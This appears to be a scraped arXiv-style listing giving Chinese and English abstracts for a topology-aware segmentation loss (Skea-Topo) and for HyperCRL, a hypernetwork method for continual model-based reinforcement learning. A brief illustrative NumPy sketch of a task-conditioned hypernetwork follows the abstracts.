拓扑一致性在网状图像的边界分割任务中起着关键作用,例如神经元电子显微镜图像中的细胞膜分割、材料显微图像中的晶界分割以及航拍图像中的道路分割。在这些领域中,分割结果的拓扑变化对下游任务产生严重影响,甚至可能超过边界本身的错位。为了增强分割结果的拓扑准确性,我们提出了Skea-Topo Aware损失函数,这是一种新颖的损失函数,考虑了每个物体的形状和像素的拓扑重要性。它由两部分组成。首先,骨架感知加权损失通过更好地利用骨架建模物体几何来提高分割准确性。其次,边界修正项通过使用真实标签和预测中的前景和背景骨架,有效识别并强调预测误差中的拓扑关键像素。实验证明,在三个不同的边界分割数据集上,基于客观和主观评估,我们的方法在VI指标上相比13种最先进方法将拓扑一致性提高了最多7点。代码可在https://github.com/clovermini/Skea_topo获取。

English abstract

Topological consistency plays a crucial role in boundary segmentation for reticular images, such as cell membrane segmentation in neuron electron microscopic images, grain boundary segmentation in material microscopic images, and road segmentation in aerial images. In these fields, topological changes in segmentation results have a serious impact on downstream tasks, which can even exceed the impact of misalignment of the boundary itself. To enhance the topological accuracy of segmentation results, we propose the Skea-Topo Aware loss, a novel loss function that takes into account the shape of each object and the topological significance of the pixels. It consists of two components. First, a skeleton-aware weighted loss improves segmentation accuracy by better modeling the object geometry with skeletons. Second, a boundary rectified term effectively identifies and emphasizes topologically critical pixels in the prediction errors using both foreground and background skeletons in the ground truth and predictions. Experiments show that our method improves topological consistency by up to 7 points in VI compared to 13 state-of-the-art methods, based on objective and subjective assessments across three different boundary segmentation datasets. The code is available at https://github.com/clovermini/Skea_topo.

2009.11997 2026-05-27 cs.LG cs.AI cs.RO Updated version

Continual Model-Based Reinforcement Learning with Hypernetworks

使用超网络的持续基于模型的强化学习

Yizhou Huang, Kevin Xie, Homanga Bharadhwaj, Florian Shkurti

Affiliations * Division of Engineering Science, University of Toronto, Canada; Department of Computer Science, University of Toronto, Canada

AI summary Proposes HyperCRL, which uses task-conditional hypernetworks to continually learn dynamics models over a sequence of tasks, avoiding retraining from scratch and keeping storage fixed. It outperforms existing fixed-capacity continual learning alternatives on robot locomotion and manipulation tasks.

Comments Updated link to project website in the abstract. 7 pages (+2 pages in appendix), 8 figures. In proceedings of the 2021 IEEE International Conference on Robotics and Automation

Details
AI Chinese abstract

在基于模型的强化学习(MBRL)和模型预测控制(MPC)中,有效规划依赖于学习到的动力学模型的准确性。在MBRL和MPC的许多实例中,该模型被假定为平稳的,并且定期从头开始重新训练,使用从环境交互开始收集的状态转移经验。这意味着训练动力学模型所需的时间(以及计划执行之间的暂停时间)随着收集的经验规模线性增长。我们认为这对于终身机器人学习来说太慢,并提出了HyperCRL,一种使用任务条件超网络在序列任务中持续学习所遇到动力学的方法。我们的方法有三个主要特点:首先,它包括不重新访问先前任务训练数据的动力学学习会话,因此只需存储最近固定大小的状态转移经验;其次,它使用固定容量的超网络来表示非平稳且任务感知的动力学;第三,它优于依赖固定容量网络的现有持续学习替代方案,并且与记忆不断增长的过去经验核心集的基线方法相比具有竞争力。我们展示了HyperCRL在机器人运动和操作场景(如推动物体和开门任务)中对持续基于模型的强化学习的有效性。我们的项目网站(含视频)位于此链接:https://rvl.cs.toronto.edu/blog/hypercrl

English abstract

Effective planning in model-based reinforcement learning (MBRL) and model-predictive control (MPC) relies on the accuracy of the learned dynamics model. In many instances of MBRL and MPC, this model is assumed to be stationary and is periodically re-trained from scratch on state transition experience collected from the beginning of environment interactions. This implies that the time required to train the dynamics model, and the pause required between plan executions, grows linearly with the size of the collected experience. We argue that this is too slow for lifelong robot learning and propose HyperCRL, a method that continually learns the encountered dynamics in a sequence of tasks using task-conditional hypernetworks. Our method has three main attributes: first, it includes dynamics learning sessions that do not revisit training data from previous tasks, so it only needs to store the most recent fixed-size portion of the state transition experience; second, it uses fixed-capacity hypernetworks to represent non-stationary and task-aware dynamics; third, it outperforms existing continual learning alternatives that rely on fixed-capacity networks, and performs competitively with baselines that remember an ever-increasing coreset of past experience. We show that HyperCRL is effective in continual model-based reinforcement learning in robot locomotion and manipulation scenarios, such as tasks involving pushing and door opening. Our project website with videos is at https://rvl.cs.toronto.edu/blog/hypercrl
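The idea of a task-conditional hypernetwork can be sketched in a few lines: a shared network maps a per-task embedding to the weights of a dynamics model, so switching tasks means switching embeddings rather than storing a separate model. The sketch below is a minimal, untrained NumPy illustration and not the HyperCRL implementation. The linear hypernetwork, the residual linear dynamics model, the class name, and all dimensions are assumptions.

```python
import numpy as np


class TaskConditionedHypernetwork:
    """Maps a task embedding to the weights of a small linear dynamics model."""

    def __init__(self, num_tasks, embed_dim, state_dim, action_dim, seed=0):
        rng = np.random.default_rng(seed)
        self.in_dim = state_dim + action_dim
        self.out_dim = state_dim
        # One embedding per task; in practice these would be learned.
        self.task_embeddings = rng.normal(scale=0.1, size=(num_tasks, embed_dim))
        # Shared projection that emits all target-model parameters at once.
        num_params = self.out_dim * self.in_dim + self.out_dim
        self.projection = rng.normal(scale=0.1, size=(num_params, embed_dim))

    def generate(self, task_id):
        """Return (weight matrix, bias) of the dynamics model for one task."""
        flat = self.projection @ self.task_embeddings[task_id]
        split = self.out_dim * self.in_dim
        weights = flat[:split].reshape(self.out_dim, self.in_dim)
        bias = flat[split:]
        return weights, bias

    def predict_next_state(self, task_id, state, action):
        """Residual prediction: next_state = state + W [state; action] + b."""
        weights, bias = self.generate(task_id)
        return state + weights @ np.concatenate([state, action]) + bias


if __name__ == "__main__":
    hyper = TaskConditionedHypernetwork(num_tasks=2, embed_dim=8,
                                        state_dim=3, action_dim=2)
    state, action = np.ones(3), np.zeros(2)
    print(hyper.predict_next_state(0, state, action))
    print(hyper.predict_next_state(1, state, action))
```

The shared projection has a fixed size regardless of how many tasks are seen; only the small embedding table grows, which is one way to read the abstract's "fixed-capacity" claim.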